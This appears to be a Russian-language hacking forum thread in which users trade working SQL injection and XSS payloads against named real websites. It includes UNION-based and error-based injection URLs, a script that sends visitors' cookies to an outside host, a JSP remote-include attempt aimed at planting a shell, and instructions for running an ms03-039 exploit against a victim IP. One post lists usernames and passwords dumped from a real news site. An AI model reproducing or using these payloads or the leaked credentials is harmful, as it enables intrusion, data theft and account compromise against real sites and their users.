Flash работает на клиенте (на компе, а не на сервере). Если ты хочешь попытаться "забраться" на сервер, то можно: - декомпилировать Flash или просто снять посылаемые запросы, чтоб посмотреть как коммуникация с сервером идет; - и потом в зависимости от того, какой клиент (PHP, JSP, ASP) на сервере попытаться найти уязвимость, из-/подменяя параметры/данные передаваемые Flash-Client'ом.
JSP XSS взлом У меня такой вопрос, т.к. я в JSP exploiting неочень пока щарю, но учусь... сайт: JSP (J2EE) (AJAX) сервер: Apache Tomcat 5.0.28 с Coyote Connector уязвимость: XSS, поле позволяет максимум 80 символов. конечная цель: добраться до данных BD (dump) пром. цель: залить/подключить что-то вроде шелла (есть ли для JSP нормальные?*), или слить оригиналы jsp страниц, чтоб посмотреть как обращение к BD идет. какой самый оптимальный способ воспользоваться. мои варианты: 1. Include, так чтоб на сайт ничего не заливать, чтоб следов поменьше было. Code: <jsp:include page="{HttpServletRequest().getParameter("xx")}" /> в хх подставил удаленный HTML. Чето не работает (( Что посоветуете? Update: * Нашел неплохой JSP File Browser http://www.vonloesch.de/jspbrowser.html
народ подскажите плз, как такое может быть Code: _ttp://flashg amest udio.com/flash_games/flash_games.php?id=17+GROUP+BY+15/* Code: _ttp://flas hgames tudio.com/flash_games/flash_games.php?id=17+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/* почему не подходит?
все подходит, выводи в 3 поле..и смотри сорец страницы Code: <title>Flash Game Studio : 4.0.27-standard</title>
создай на своём хосте 1.js в него впиши PHP: img=new Image(); img.src="http://site.ru/image.gif?"+document.cookie; ну и где ты там нашел xss впиши : PHP: <script src=http://site.ru/1.js></script>
Речь о сайте онлайновой РПГ. Тут MS SQL, не имел с ний дела никогда и не нашел ничего внятного, везде практически речь о MySQL. выглядит так: Code: /reset?char=Fate Выводит страницу которая показывает характеристики персонажа и кол-во уровней до ресета. Примерно так: Status On Name Fate Class Fairy Elf Level 1 Resets 0 PK Level Default Map Devias Strenght 22 Agility 25 Vitality 10 Energy 15 Code: /reset?char=Fate'[code] выводит ошибку БД соответсвенно, та же ошибка [code]/char/Fate' та же в регестрации в поле e-mail. Code: char/Fate'%20or%201=1--%20%20SELECT%20*%20FROM%20product%20WHERE%20PCategory=#char# or 1=1-- дает вывод Status Name darkknight Class Dark Knight Level 1 Resets 0 PK Level Default Map Lorencia Strenght 18 Agility 18 Vitality 15 Energy 30 Вроде все так, но в поле статус отсутствуют данные, а поля Strenght, Agility, Vitality, Energy не соответствуют полю класс, то есть если поле класс у нас Dark Knight, то эти поля не могут иметь такие значения. Вопрос, инъекция ли это и можно ли извлечь что либо полезное из всего этого? Если можно, то подскажите плз где можно почитать подробно про MS SQL inj.
Code: http://www.100mat.ru/ubb/showthreaded.php?Cat=&Board=server&Number=1111+or+(select+count(*)+from+w3t_Posts+group+by+concat(version(),floor(rand(0)*2)))+--+
хелп, подскажите плз, что-то не могу понять опять, подставлял во все столбцы, но что-то ничего не отображается.. (( пробовал кодировать/декодировать, шифровать.. но вродеж он и без этого должен цифры отображать нормально? пробовал хексить слово и потом по коду искать, но тоже ни как.. Code: _ttp://www.asian ewsnet.net/news.php?id=-60+union+select+1,2,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* зы И еще на другом сайте пробую просмотреть таблицы, так показывает таблицу Code: ?id=-11+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+29,1+--+ но почему-то не могу к ней подключиться, ошибку пишет Code: ?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+tablename+--+
вопрос по скулю: Цитата: +and+(select+top+1+isnull(cast(+as+nvarchar(4000)),char(32))%2bchar(94)%2bisnull( cast([password]+as+nvarchar(4000)),char(32))+from+[jackson]..[users]+where+email+not+in+(select+top+1+email+from+[jackson]..[users]+where+1=1+order+by+[email])+)%3E0-- тут выводится в ответе [email protected]^passmy Возможно ли сделать запрос чтобы выдавало не [email protected]^passmy а [email protected]^passmy!!! Тоесть надо добавит 0x212121 в начало и конец каждого ответа это чтоб со страницы корректно спарсит нужно
маф туц [/QUOTE] Возможно скрипт работает с другой БД.Укажите в запросе имя БД Code: -11+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+[B]database[/B].tablename+--+ Имя базы данных: Code: -11+union+select+1,2,3,concat_ws(0x3a,table_name,table_schema),5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+29,1+--+ Зы:Может не хватать прав на доступ
Намекните где можно почитать, как заюзать ms03-039 и есть ли он в метасплойте. Ато в мс я его не нашел (3,2), скачал скомпилированую версию, а как заюзать хз. В cmd выдает: usage 1.exe <target_ip> Что дальше?
В cmd выдает: usage 1.exe <target_ip> Ну запусти сплойт с параметром "<target_ip>" - это ip адрес жертвы example:1.exe 192.168.0.1 Зы:Самого сплойта я не видел и насчет МС незнаю
2 Gidz http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserName,11,12,13,14,15,Password,17,18,19,20,21,22,23,24+from+tuser+limit+1,1-- administrator:0641 http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserName,11,12,13,14,15,Password,17,18,19,20,21,22,23,24+from+tuser+limit+2,1-- admin123:admin123 http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserName,11,12,13,14,15,Password,17,18,19,20,21,22,23,24+from+tuser+limit+3,1-- ann:bkk1854 И так далее и тому подобное...
Под кавычкой имееться в виду "<" ? Че-то не особо понятно зы:Моно попробовать iframe strip_tags() мб...
2 Nightmarе: <td bgcolor="white"><font color="#000000"><BODY ONLOAD=javascript:alert()>ASS</font></td> только что проверил в последних OPERA, IE, в FF не запахало почему-то
